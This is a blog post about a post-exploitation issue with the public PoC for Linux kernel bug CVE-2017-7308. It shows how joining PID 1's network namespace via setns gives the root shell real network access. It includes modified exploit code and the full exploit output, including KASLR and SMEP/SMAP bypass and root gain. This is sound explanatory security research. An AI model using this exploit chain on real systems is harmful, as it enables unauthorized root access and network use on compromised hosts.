Solving a post-exploitation issue with CVE-2017-7308

CVE-2017-7308 is a Linux kernel vulnerability related to packet sockets. This post focuses on an issue that shows up after exploiting the bug. For an excellent write-up on the bug itself and its exploitation, check out Andrey's post on the P0 blog.

The bug itself is a signedness issue that leads to an exploitable heap out-of-bounds write. It can be triggered by providing specific parameters to the PACKET_RX_RING option on an AF_PACKET socket with the TPACKET_V3 ring buffer version enabled.

The bug affects any kernel with AF_PACKET sockets enabled (CONFIG_PACKET=y), which is the case for many Linux distributions. Exploitation requires the CAP_NET_RAW capability in order to create such sockets. In general, this capability is only available to privileged users. However, an unprivileged user can obtain it inside a user namespace, provided user namespaces are enabled (CONFIG_USER_NS=y) and accessible to unprivileged users.

Andrey provided a PoC in order to demonstrate the exploitation of this vulnerability. If you compile the code and run it, you get a nice shell:

[Image: poc1]

Great, we got a shell. So far, so good. But here's the thing: I wanted to do some network-related stuff after exploitation and found out that I was completely isolated from the real network interfaces. Listing the network interfaces from the freshly spawned shell gives this:

[Image: poc2]

As seen in the image, we only have the loopback interface available and can't ping Google. At this point, the immediate questions are: why is this happening, and how do we solve it?

The first question is answered almost immediately after reading Andrey's post, looking at the source and reading the Linux packet socket documentation.

In his code, he creates a new user namespace by calling the unshare function with the CLONE_NEWUSER flag [1]. This moves the calling process into a new user namespace that is not shared with any previously existing process. As mentioned earlier, this is a necessary condition for exploitation: normally only privileged users have the CAP_NET_RAW capability, but an unprivileged user inside a new user namespace holds it there and can create packet sockets. That's why he uses unshare(CLONE_NEWUSER).

Then, a second call to the unshare function is made, this time with the CLONE_NEWNET flag [2]. According to the docs, this flag "Unshare the network namespace, so that the calling process is moved into a new network namespace which is not shared with any previously existing process." Now things are starting to clear up. The use of CLONE_NEWUSER was obvious to me, but why must the network be isolated? Again, Andrey's post has the answer. Basically, Andrey needed an isolated environment with no interference, so that he could send packets with arbitrary content through the loopback interface and control the out-of-bounds write reliably. Doing this in an environment with lots of interfaces and lots of packet data coming and going would have lowered the reliability of the exploit.
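
The two calls described above can be sketched roughly as follows. This is only a minimal illustration, not Andrey's actual setup code: enter_sandbox is a hypothetical name, and the sketch leaves out any other setup the PoC performs. It assumes a kernel that allows unprivileged user namespaces; otherwise the first call simply fails.

```c
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>

/* Hypothetical helper: move the calling process into a fresh user
 * namespace and then into a fresh network namespace.
 * Returns 0 on success, -1 if either unshare() call fails. */
int enter_sandbox(void)
{
    /* New user namespace: the caller gains capabilities (including
     * CAP_NET_RAW) that are only valid inside this namespace. */
    if (unshare(CLONE_NEWUSER) == -1) {
        perror("unshare(CLONE_NEWUSER)");
        return -1;
    }

    /* New network namespace: from here on the process only sees a
     * private loopback interface. */
    if (unshare(CLONE_NEWNET) == -1) {
        perror("unshare(CLONE_NEWNET)");
        return -1;
    }

    return 0;
}
```

The order matters in this sketch: creating the network namespace needs a capability that an unprivileged process only holds once it is inside its own user namespace.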

Now that we understand the real problem, we must find a way around it. The answer is setns, one of the three main functions in the namespace API. According to the docs: "The setns(2) system call allows the calling process to join an existing namespace. The namespace to join is specified via a file descriptor that refers to one of the /proc/[pid]/ns files". There are a few namespaces we can join, but the one we are interested in is /proc/[pid]/ns/net. This file is a handle for the network namespace of the process. The only thing left is to decide which network namespace to join. To be more specific, we need to know the PID of the process whose network namespace we want to join.
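
Since /proc/[pid]/ns/net is a handle to a namespace, it can also be used to tell whether two processes share one. The sketch below compares the device and inode numbers behind the two handles, which is the comparison the namespaces(7) man page describes. The name same_net_namespace is hypothetical, and the helper assumes /proc is mounted.

```c
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: returns 1 if both PIDs are in the same network
 * namespace, 0 if they are not, and -1 if either handle cannot be
 * inspected (missing process, no permission, /proc not mounted). */
int same_net_namespace(pid_t a, pid_t b)
{
    char path_a[64];
    char path_b[64];
    struct stat st_a;
    struct stat st_b;

    snprintf(path_a, sizeof(path_a), "/proc/%ld/ns/net", (long)a);
    snprintf(path_b, sizeof(path_b), "/proc/%ld/ns/net", (long)b);

    /* stat() follows the symlink, so st_dev and st_ino identify the
     * namespace itself rather than the /proc entry. */
    if (stat(path_a, &st_a) == -1 || stat(path_b, &st_b) == -1)
        return -1;

    return st_a.st_dev == st_b.st_dev && st_a.st_ino == st_b.st_ino;
}
```

Calling same_net_namespace(getpid(), 1) from the sandboxed shell should report 0, since the exploit process lives in its own network namespace. Inspecting another process's handle needs sufficient privileges, so an unprivileged caller may get -1 instead.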

I decided to join the network namespace of PID 1. This is the init process, the first process the kernel starts, and on a typical host it runs in the initial network namespace, so I guessed it would have access to every network interface on the system. Joining that namespace requires privileges (setns(2) asks for CAP_SYS_ADMIN), but that's not a problem for us, because we can do it AFTER exploiting the bug and gaining root privileges :)

So, in order to join the network namespace of PID 1, we must first obtain a file descriptor for it. We do it this way:

int fd = open("/proc/1/ns/net", O_RDONLY);
 

Once we have a file descriptor, we pass it to setns. The second parameter states which type of namespace the descriptor must refer to, in our case a network namespace:

setns(fd, CLONE_NEWNET);
 

In order to test this, I slightly modified the exec_shell function from Andrey's PoC, which runs after privileges have been escalated:

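/* setns() requires _GNU_SOURCE and <sched.h>; open() requires <fcntl.h>. */
void exec_shell() {
  char *shell = "/bin/bash";
  char *args[] = {shell, "-i", NULL};
  int fd;

  /* Handle to the network namespace of init (PID 1). */
  fd = open("/proc/1/ns/net", O_RDONLY);
  if (fd == -1) {
    perror("error opening /proc/1/ns/net");
    exit(EXIT_FAILURE);
  }

  /* Leave the sandbox's network namespace and join the one of PID 1. */
  if (setns(fd, CLONE_NEWNET) == -1) {
    perror("error calling setns");
    exit(EXIT_FAILURE);
  }
  close(fd); /* the descriptor is not needed once we have joined */

  execve(shell, args, NULL);
  perror("error calling execve"); /* only reached if execve fails */
  exit(EXIT_FAILURE);
}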
 

After compiling and executing the exploit, here's the result:

fastix@fastix-virtual-machine:~$ gcc cve-2017-7308.c -o exploit
fastix@fastix-virtual-machine:~$ ./exploit
[.] starting
[.] namespace sandbox set up
[.] KASLR bypass enabled, getting kernel addr
[.] done, kernel text: ffffffffb5800000
[.] commit_creds: ffffffffb58a5cf0
[.] prepare_kernel_cred: ffffffffb58a60e0
[.] native_write_cr4: ffffffffb5864210
[.] padding heap
[.] done, heap is padded
[.] SMEP & SMAP bypass enabled, turning them off
[.] done, SMEP & SMAP should be off now
[.] executing get root payload 0x55fa39fa7612
[.] done, should be root now
[.] checking if we got root
[+] got r00t ^_^
root@fastix-virtual-machine:/home/fastix# id
uid=0(root) gid=0(root) groups=0(root)
root@fastix-virtual-machine:/home/fastix# ip link list
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000
    link/ether 00:0c:29:98:3b:85 brd ff:ff:ff:ff:ff:ff
root@fastix-virtual-machine:/home/fastix# ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
        inet 192.168.1.112 netmask 255.255.255.0 broadcast 192.168.1.255
        inet6 fe80::5cd:ee6f:92b:ccc6 prefixlen 64 scopeid 0x20
        ether 00:0c:29:98:3b:85 txqueuelen 1000 (Ethernet)
        RX packets 69 bytes 9044 (9.0 KB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 85 bytes 9782 (9.7 KB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
        inet 127.0.0.1 netmask 255.0.0.0
        inet6 ::1 prefixlen 128 scopeid 0x10
        loop txqueuelen 1 (Local Loopback)
        RX packets 3329 bytes 206245 (206.2 KB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 3329 bytes 206245 (206.2 KB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

root@fastix-virtual-machine:/home/fastix# ping www.google.com
PING www.google.com (216.58.202.132) 56(84) bytes of data.
64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=1 ttl=50 time=52.7 ms
64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=2 ttl=50 time=54.6 ms
64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=3 ttl=50 time=51.9 ms
64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=4 ttl=50 time=53.7 ms
^C
--- www.google.com ping statistics ---
5 packets transmitted, 4 received, 20% packet loss, time 4008ms
rtt min/avg/max/mdev = 51.987/53.268/54.686/1.045 ms

As you can see, apart from the loopback interface, now we have the ens33 interface and can connect to the outside world.